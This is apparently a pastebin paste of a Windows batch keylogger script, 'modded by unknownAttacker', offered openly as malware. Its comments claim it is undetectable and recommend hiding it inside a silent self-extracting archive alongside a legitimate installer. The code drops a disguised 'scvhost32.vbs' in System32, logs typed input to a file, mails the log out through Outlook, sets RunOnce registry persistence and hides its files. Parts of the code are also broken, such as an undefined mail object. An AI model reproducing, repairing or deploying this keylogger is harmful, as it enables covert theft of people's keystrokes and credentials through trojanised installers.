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a guest
Aug 18th, 2018
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  1. @echo off
  2. REM  This is a windows batch source code of a simple keylogger
  3. REM  It uses outlook to send you teh l0gz
  4. REM  I don't know who wrote the original one, this is a modified version
  5. REM  Modified version creates files with more plausible names
  6. REM  All the other tweaks are minor and for evasion only
  7. REM  'Hideself' Advanced Extended Batch Command is used so the program will run in the background
  8. REM  (if compiled with Advanced BAT To EXE Converter)
  9. REM  It's currently FUD so just make a silent RAR SFX containing this and sth useful, like a legit installer
  11. REM  modded by unknownAttacker
  13. rem Hideself
  15. set location = %windir%\System32\scvhost32.vbs
  16. echo set shell = CreateObject("Wscript.Shell") >> %location%
  17. echo "C:\windows\k.bat", 0 >> %location%
  18. echo @echo off >> C:\windows\k.bat
  19. echo color f7 >> C:\windows\k.bat
  20. echo :go >> C:\windows\k.bat
  21. echo echo .>>c:\log.txt  >> C:\windows\k.bat
  22. echo echo :  >> C:\windows\k.bat
  23. echo set /p keys=  >> C:\windows\k.bat
  24. echo echo %keys% >> c:\log.txt  >> C:\windows\k.bat
  25. echo goto go >> C:\windows\k.bat
  26. echo start %location%  >> C:\windows\k.bat
  27. echo(
  28. echo Dim x > C:\config.vbs
  29. echo on error resume next >> C:\config.vbs
  30. echo Set fso =" Scripting.FileSystem.Object" >> C:\config.vbs
  31. echo Set so=CreateObject(fso) >> C:\config.vbs
  32. echo Set ol=CreateObject("Outlook.Application") >> C:\config.vbs
  33. echo Set out=WScript.CreateObject("Outlook.Application") >> C:\config.vbs
  34. echo"">> C:\config.vbs
  35. echo Mail.Subject="Stuff" >> C:\config.vbs
  36. echo Mail.Body="l0gz have arrived" >> C:\config.vbs
  37. echo Mail.Attachments.Add("C:log.txt") >> C:\config.vbs
  38. echo Mail.Send >> C:\config.vbs
  39. echo Next >> C:\config.vbs
  40. echo ol.Quit >> C:\config.vbs
  41. C:\config.vbs
  42. )>>C:\Windows\k.bat
  43. ping localhost 5 > nul
  44. del C:\config.vbs
  45. REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v WinBoot /t REG_SZ /d %location%
  46. REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v WinBoot /t REG_SZ /d C:\Windows\k.bat
  47. attrib +h +s %location%
  48. attrib +h +s C:\Windows\k.bat
  49. attrib +h -r log.txt
  50. start %location%
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